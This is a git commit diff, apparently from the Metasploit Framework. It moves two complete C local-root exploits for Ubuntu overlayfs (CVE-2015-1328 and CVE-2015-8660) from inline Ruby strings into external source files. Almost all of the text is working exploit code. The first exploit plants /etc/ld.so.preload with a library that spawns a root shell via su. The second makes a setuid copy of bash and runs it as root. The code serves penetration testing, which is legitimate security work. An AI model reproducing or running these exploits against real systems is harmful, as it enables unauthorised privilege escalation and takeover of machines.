moved c code to external sources
parent
27cf5c65c4
commit
12493d5c06
|
@ -0,0 +1,112 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/mount.h>
|
||||
#include <signal.h>
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
#include <linux/sched.h>
|
||||
|
||||
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
|
||||
|
||||
static char child_stack[1024*1024];
|
||||
|
||||
static int
|
||||
child_exec(void *stuff)
|
||||
{
|
||||
char *file;
|
||||
system("rm -rf /tmp/ns_sploit");
|
||||
mkdir("/tmp/ns_sploit", 0777);
|
||||
mkdir("/tmp/ns_sploit/work", 0777);
|
||||
mkdir("/tmp/ns_sploit/upper",0777);
|
||||
mkdir("/tmp/ns_sploit/o",0777);
|
||||
|
||||
fprintf(stderr,"mount #1\n");
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
|
||||
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
|
||||
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
|
||||
exit(-1);
|
||||
}
|
||||
file = ".access";
|
||||
chmod("/tmp/ns_sploit/work/work",0777);
|
||||
} else file = "ns_last_pid";
|
||||
|
||||
chdir("/tmp/ns_sploit/o");
|
||||
rename(file,"ld.so.preload");
|
||||
|
||||
chdir("/");
|
||||
umount("/tmp/ns_sploit/o");
|
||||
fprintf(stderr,"mount #2\n");
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
|
||||
exit(-1);
|
||||
}
|
||||
chmod("/tmp/ns_sploit/work/work",0777);
|
||||
}
|
||||
|
||||
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
|
||||
umount("/tmp/ns_sploit/o");
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
int status, fd, lib;
|
||||
pid_t wrapper, init;
|
||||
int clone_flags = CLONE_NEWNS | SIGCHLD;
|
||||
|
||||
fprintf(stderr,"spawning threads\n");
|
||||
|
||||
if((wrapper = fork()) == 0) {
|
||||
if(unshare(CLONE_NEWUSER) != 0)
|
||||
fprintf(stderr, "failed to create new user namespace\n");
|
||||
|
||||
if((init = fork()) == 0) {
|
||||
pid_t pid =
|
||||
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
|
||||
if(pid < 0) {
|
||||
fprintf(stderr, "failed to create new mount namespace\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
waitpid(pid, &status, 0);
|
||||
|
||||
}
|
||||
|
||||
waitpid(init, &status, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
usleep(300000);
|
||||
|
||||
wait(NULL);
|
||||
|
||||
fprintf(stderr,"child threads done\n");
|
||||
|
||||
fd = open("/etc/ld.so.preload",O_WRONLY);
|
||||
|
||||
if(fd == -1) {
|
||||
fprintf(stderr,"exploit failed\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stderr,"/etc/ld.so.preload created\n");
|
||||
fprintf(stderr,"creating shared library\n");
|
||||
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
|
||||
write(lib,LIB,strlen(LIB));
|
||||
close(lib);
|
||||
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
|
||||
if(lib != 0) {
|
||||
fprintf(stderr,"couldn't create dynamic library\n");
|
||||
exit(-1);
|
||||
}
|
||||
write(fd,"/tmp/ofs-lib.so\n",16);
|
||||
close(fd);
|
||||
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
|
||||
execl("/bin/su","su",NULL);
|
||||
}
|
||||
|
|
@ -0,0 +1,78 @@
|
|||
#include <stdio.h>
|
||||
#include <sched.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/mount.h>
|
||||
#include <sys/types.h>
|
||||
#include <signal.h>
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
#include <linux/sched.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
static char child_stack[1024*1024];
|
||||
|
||||
static int
|
||||
child_exec(void *stuff)
|
||||
{
|
||||
system("rm -rf /tmp/haxhax");
|
||||
mkdir("/tmp/haxhax", 0777);
|
||||
mkdir("/tmp/haxhax/w", 0777);
|
||||
mkdir("/tmp/haxhax/u",0777);
|
||||
mkdir("/tmp/haxhax/o",0777);
|
||||
|
||||
if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
|
||||
fprintf(stderr,"mount failed..\n");
|
||||
}
|
||||
|
||||
chmod("/tmp/haxhax/w/work",0777);
|
||||
chdir("/tmp/haxhax/o");
|
||||
chmod("bash",04755);
|
||||
chdir("/");
|
||||
umount("/tmp/haxhax/o");
|
||||
return 0;
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
int status;
|
||||
pid_t wrapper, init;
|
||||
int clone_flags = CLONE_NEWNS | SIGCHLD;
|
||||
struct stat s;
|
||||
|
||||
if((wrapper = fork()) == 0) {
|
||||
if(unshare(CLONE_NEWUSER) != 0)
|
||||
fprintf(stderr, "failed to create new user namespace\n");
|
||||
|
||||
if((init = fork()) == 0) {
|
||||
pid_t pid =
|
||||
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
|
||||
if(pid < 0) {
|
||||
fprintf(stderr, "failed to create new mount namespace\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
waitpid(pid, &status, 0);
|
||||
|
||||
}
|
||||
|
||||
waitpid(init, &status, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
usleep(300000);
|
||||
|
||||
wait(NULL);
|
||||
|
||||
stat("/tmp/haxhax/u/bash",&s);
|
||||
|
||||
if(s.st_mode == 0x89ed)
|
||||
execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
|
||||
|
||||
fprintf(stderr,"couldn't create suid :(\n");
|
||||
return -1;
|
||||
}
|
|
@ -163,214 +163,14 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
# Exploit Title: ofs.c - overlayfs local root in ubuntu
|
||||
# Date: 2015-06-15
|
||||
# Exploit Author: rebel
|
||||
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
|
||||
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
|
||||
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
|
||||
|
||||
cve_2015_1328 = %q{
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/mount.h>
|
||||
#include <signal.h>
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
#include <linux/sched.h>
|
||||
|
||||
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
|
||||
|
||||
static char child_stack[1024*1024];
|
||||
|
||||
static int
|
||||
child_exec(void *stuff)
|
||||
{
|
||||
char *file;
|
||||
system("rm -rf /tmp/ns_sploit");
|
||||
mkdir("/tmp/ns_sploit", 0777);
|
||||
mkdir("/tmp/ns_sploit/work", 0777);
|
||||
mkdir("/tmp/ns_sploit/upper",0777);
|
||||
mkdir("/tmp/ns_sploit/o",0777);
|
||||
|
||||
fprintf(stderr,"mount #1\n");
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
|
||||
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
|
||||
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
|
||||
exit(-1);
|
||||
}
|
||||
file = ".access";
|
||||
chmod("/tmp/ns_sploit/work/work",0777);
|
||||
} else file = "ns_last_pid";
|
||||
|
||||
chdir("/tmp/ns_sploit/o");
|
||||
rename(file,"ld.so.preload");
|
||||
|
||||
chdir("/");
|
||||
umount("/tmp/ns_sploit/o");
|
||||
fprintf(stderr,"mount #2\n");
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
|
||||
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
|
||||
exit(-1);
|
||||
}
|
||||
chmod("/tmp/ns_sploit/work/work",0777);
|
||||
}
|
||||
|
||||
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
|
||||
umount("/tmp/ns_sploit/o");
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
int status, fd, lib;
|
||||
pid_t wrapper, init;
|
||||
int clone_flags = CLONE_NEWNS | SIGCHLD;
|
||||
|
||||
fprintf(stderr,"spawning threads\n");
|
||||
|
||||
if((wrapper = fork()) == 0) {
|
||||
if(unshare(CLONE_NEWUSER) != 0)
|
||||
fprintf(stderr, "failed to create new user namespace\n");
|
||||
|
||||
if((init = fork()) == 0) {
|
||||
pid_t pid =
|
||||
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
|
||||
if(pid < 0) {
|
||||
fprintf(stderr, "failed to create new mount namespace\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
waitpid(pid, &status, 0);
|
||||
|
||||
}
|
||||
|
||||
waitpid(init, &status, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
usleep(300000);
|
||||
|
||||
wait(NULL);
|
||||
|
||||
fprintf(stderr,"child threads done\n");
|
||||
|
||||
fd = open("/etc/ld.so.preload",O_WRONLY);
|
||||
|
||||
if(fd == -1) {
|
||||
fprintf(stderr,"exploit failed\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stderr,"/etc/ld.so.preload created\n");
|
||||
fprintf(stderr,"creating shared library\n");
|
||||
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
|
||||
write(lib,LIB,strlen(LIB));
|
||||
close(lib);
|
||||
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
|
||||
if(lib != 0) {
|
||||
fprintf(stderr,"couldn't create dynamic library\n");
|
||||
exit(-1);
|
||||
}
|
||||
write(fd,"/tmp/ofs-lib.so\n",16);
|
||||
close(fd);
|
||||
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
|
||||
execl("/bin/su","su",NULL);
|
||||
}
|
||||
}
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-1328', '1328.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_1328 = fd.read(fd.stat.size)
|
||||
|
||||
# direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
|
||||
# Exploit Title: overlayfs local root
|
||||
# Date: 2016-01-05
|
||||
# Exploit Author: rebel
|
||||
# Version: Ubuntu 14.04 LTS, 15.10 and more
|
||||
# Tested on: Ubuntu 14.04 LTS, 15.10
|
||||
# CVE : CVE-2015-8660
|
||||
cve_2015_8660 = %q{
|
||||
#include <stdio.h>
|
||||
#include <sched.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/mount.h>
|
||||
#include <sys/types.h>
|
||||
#include <signal.h>
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
#include <linux/sched.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
static char child_stack[1024*1024];
|
||||
|
||||
static int
|
||||
child_exec(void *stuff)
|
||||
{
|
||||
system("rm -rf /tmp/haxhax");
|
||||
mkdir("/tmp/haxhax", 0777);
|
||||
mkdir("/tmp/haxhax/w", 0777);
|
||||
mkdir("/tmp/haxhax/u",0777);
|
||||
mkdir("/tmp/haxhax/o",0777);
|
||||
|
||||
if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
|
||||
fprintf(stderr,"mount failed..\n");
|
||||
}
|
||||
|
||||
chmod("/tmp/haxhax/w/work",0777);
|
||||
chdir("/tmp/haxhax/o");
|
||||
chmod("bash",04755);
|
||||
chdir("/");
|
||||
umount("/tmp/haxhax/o");
|
||||
return 0;
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char **argv)
|
||||
{
|
||||
int status;
|
||||
pid_t wrapper, init;
|
||||
int clone_flags = CLONE_NEWNS | SIGCHLD;
|
||||
struct stat s;
|
||||
|
||||
if((wrapper = fork()) == 0) {
|
||||
if(unshare(CLONE_NEWUSER) != 0)
|
||||
fprintf(stderr, "failed to create new user namespace\n");
|
||||
|
||||
if((init = fork()) == 0) {
|
||||
pid_t pid =
|
||||
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
|
||||
if(pid < 0) {
|
||||
fprintf(stderr, "failed to create new mount namespace\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
waitpid(pid, &status, 0);
|
||||
|
||||
}
|
||||
|
||||
waitpid(init, &status, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
usleep(300000);
|
||||
|
||||
wait(NULL);
|
||||
|
||||
stat("/tmp/haxhax/u/bash",&s);
|
||||
|
||||
if(s.st_mode == 0x89ed)
|
||||
execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
|
||||
|
||||
fprintf(stderr,"couldn't create suid :(\n");
|
||||
return -1;
|
||||
}
|
||||
}
|
||||
path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-8660', '8660.c')
|
||||
fd = ::File.open( path, "rb")
|
||||
cve_2015_8660 = fd.read(fd.stat.size)
|
||||
|
||||
filename = rand_text_alphanumeric(8)
|
||||
executable_path = "#{datastore['WritableDir']}/#{filename}"
|
||||
|
|
Loading…
Reference in New Issue